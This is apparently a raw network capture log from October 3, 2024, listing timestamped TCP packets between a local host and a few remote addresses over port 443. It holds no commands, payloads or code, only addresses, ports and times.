                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370361090 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370373964 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370390892 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370430946 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370446920 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370727062 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370834112 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.370974064 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371083021 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371090889 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371108055 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371189117 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371206045 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371270895 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371277094 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371318102 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371417999 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.371469975 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.470062971 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.470120907 CEST49738443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.629704952 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.674639940 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.723736048 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.723764896 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.724559069 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.725452900 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.725528002 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.726265907 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.726479053 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.727225065 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.727237940 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.728055000 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.728063107 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.760365963 CEST49738443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.760401964 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.760827065 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.768446922 CEST49738443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.776731968 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.778258085 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.780673027 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.780738115 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.783318043 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.783427000 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.785305977 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.785449028 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.785667896 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.785685062 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.815431118 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.826010942 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.846360922 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.846470118 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.846518993 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.848346949 CEST49740443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.848376036 CEST44349740104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.922888041 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.923027992 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.923088074 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.923114061 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.923257113 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.923314095 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.931974888 CEST49739443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.932009935 CEST44349739104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.954224110 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.954329967 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.954379082 CEST49738443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.958218098 CEST49738443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.958251953 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.958296061 CEST49738443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:26.958303928 CEST44349738184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.237385035 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.237418890 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.237500906 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.237807989 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.237818956 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.239490986 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.239501953 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.239569902 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.239783049 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.239794016 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.727967978 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.731607914 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.737356901 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.737376928 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.737643003 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.737649918 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.738755941 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.739084959 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.739120007 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.739281893 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.739762068 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.739900112 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.739949942 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.740034103 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.783427954 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.783449888 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.879637957 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.879817963 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.879900932 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881134987 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881294012 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881381035 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881398916 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881417036 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881453991 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881484032 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881616116 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881658077 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881664991 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881772995 CEST49741443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881792068 CEST44349741104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881827116 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881884098 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.881891012 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.882399082 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.882503986 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.882510900 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.891369104 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.891488075 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.891638041 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.891881943 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.891932011 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.934294939 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.934303999 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.967664003 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.967720985 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.967727900 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.967834949 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.967871904 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.967878103 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968000889 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968096018 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968101978 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968372107 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968410015 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968410015 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968422890 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968463898 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968736887 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.968801022 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969043016 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969048977 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969564915 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969626904 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969633102 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969755888 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969786882 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969804049 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969810009 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.969876051 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.970339060 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.970511913 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.970602989 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.970608950 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.970704079 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.970747948 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:27.970756054 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.011771917 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.011806965 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.053041935 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.054640055 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.054850101 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.054898977 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.054907084 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055021048 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055089951 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055098057 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055221081 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055325031 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055347919 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055388927 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055396080 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055438995 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055474997 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055497885 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055525064 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055839062 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055907965 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055913925 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.055995941 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056046963 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056054115 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056091070 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056163073 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056215048 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056685925 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056765079 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056869984 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056925058 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.056991100 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.057045937 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.057354927 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.057408094 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.057523012 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.057578087 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.104062080 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.104149103 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141160011 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141222000 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141266108 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141326904 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141691923 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141756058 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141807079 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.141983986 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.142009974 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.142021894 CEST44349742104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.142036915 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.142061949 CEST49742443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.285161018 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.285223961 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.285279989 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.285602093 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.285619974 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.351396084 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.352873087 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.352983952 CEST44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.353162050 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.353779078 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.353816032 CEST44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.354043961 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.354080915 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.354562998 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.354967117 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.355231047 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.357023954 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.403419971 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.489655972 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.489839077 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.489917994 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.491070986 CEST49746443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.491117954 CEST44349746104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.759612083 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.805422068 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.824723959 CEST44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:28.870395899 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.288496017 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.288533926 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.288853884 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.288934946 CEST44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.290122032 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.290297031 CEST44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.294389963 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.294692993 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.295021057 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.295231104 CEST44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.296897888 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.297188997 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.297291040 CEST49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.297386885 CEST44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.343399048 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405375957 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405507088 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405584097 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405597925 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405666113 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405719995 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405725956 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405800104 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405884027 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405930996 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.405936956 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.406016111 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.406064987 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.406069994 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.406112909 CEST49747443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.409938097 CEST44349747104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:29.410088062 CEST44349747104.18.95.41192.168.2.6
